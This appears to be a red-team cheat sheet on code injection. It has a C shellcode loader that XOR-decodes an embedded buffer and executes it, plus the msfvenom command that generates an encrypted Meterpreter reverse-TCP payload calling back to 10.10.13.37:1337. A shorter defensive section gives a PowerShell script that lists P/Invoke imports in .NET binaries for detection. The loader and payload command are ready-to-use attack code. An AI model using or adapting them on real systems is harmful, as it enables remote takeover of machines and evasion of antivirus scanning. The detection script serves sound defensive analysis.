Code Injection

Shellcode as Function

Linux example. Compile with an executable stack:
$ gcc -o loader loader.c -z execstack
loader.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.13.37 LPORT=1337 -f c -o met.c --encrypt xor --encrypt-key a
// XOR-encoded payload bytes as emitted by the msfvenom line above (-f c).
// The literal is elided ("...") in this listing, so it is not a usable buffer as-is.
// Declared from a string literal, so sizeof(buf) includes the trailing NUL.
unsigned char buf[] =
"\x31\x33...\x33\x37";
// Decodes the global `buf` in place and transfers control to it.
// argc/argv are unused. Returns nothing explicitly; main never reaches its end
// unless the payload returns.
int main (int argc, char **argv)
{
    int bufsize = (int)sizeof(buf);
    // bufsize-1 skips the string literal's terminating NUL.
    // Single-byte XOR with 'a' matches the --encrypt-key in the msfvenom line above.
    for (int i = 0; i < bufsize-1; i++) { buf[i] = buf[i] ^ 'a'; }
    // Reinterpret the decoded bytes as a function with an unspecified parameter list.
    int (*ret)() = (int(*)())buf;
    // Execution continues inside buf from here.
    ret();
}

Detection

Show P/Invoke imports in a .NET assembly with System.Reflection.Metadata and PowerShell Core (stolen from 1, 2):
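# Lists every P/Invoke (DllImport) target declared in a managed assembly by
# reading its metadata tables directly. The file is only opened for reading and
# is never loaded as an assembly, so no code from it runs in this process.
# Output per import: "<module>, <ImplMap attributes>" on one line, the imported
# function name on the next.
$assembly = "\path\to\csharp\binary.exe"

$stream = [System.IO.File]::OpenRead($assembly)
$peReader = $null
try {
    # LeaveOpen: the PEReader does not own $stream, so the handle is closed in finally below.
    $peReader = [System.Reflection.PortableExecutable.PEReader]::new($stream, [System.Reflection.PortableExecutable.PEStreamOptions]::LeaveOpen -bor [System.Reflection.PortableExecutable.PEStreamOptions]::PrefetchMetadata)
    $metadataReader = [System.Reflection.Metadata.PEReaderExtensions]::GetMetadataReader($peReader)

    foreach ($typeHandle in $metadataReader.TypeDefinitions) {
        $typeDef = $metadataReader.GetTypeDefinition($typeHandle)
        foreach ($methodHandle in $typeDef.GetMethods()) {
            $methodDef = $metadataReader.GetMethodDefinition($methodHandle)

            # Methods without a DllImport have no ImplMap row, which shows up as a nil module handle.
            $import = $methodDef.GetImport()
            if ($import.Module.IsNil) {
                continue
            }

            $dllImportFuncName = $metadataReader.GetString($import.Name)
            $dllImportParameters = $import.Attributes.ToString()
            $dllImportPath = $metadataReader.GetString($metadataReader.GetModuleReference($import.Module).Name)
            Write-Host "$dllImportPath, $dllImportParameters`n$dllImportFuncName`n"
        }
    }
}
finally {
    # Release the reader and the file handle even if the input is not a valid
    # PE/managed image and one of the reader calls throws.
    if ($null -ne $peReader) { $peReader.Dispose() }
    $stream.Dispose()
}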

Tools

Injector
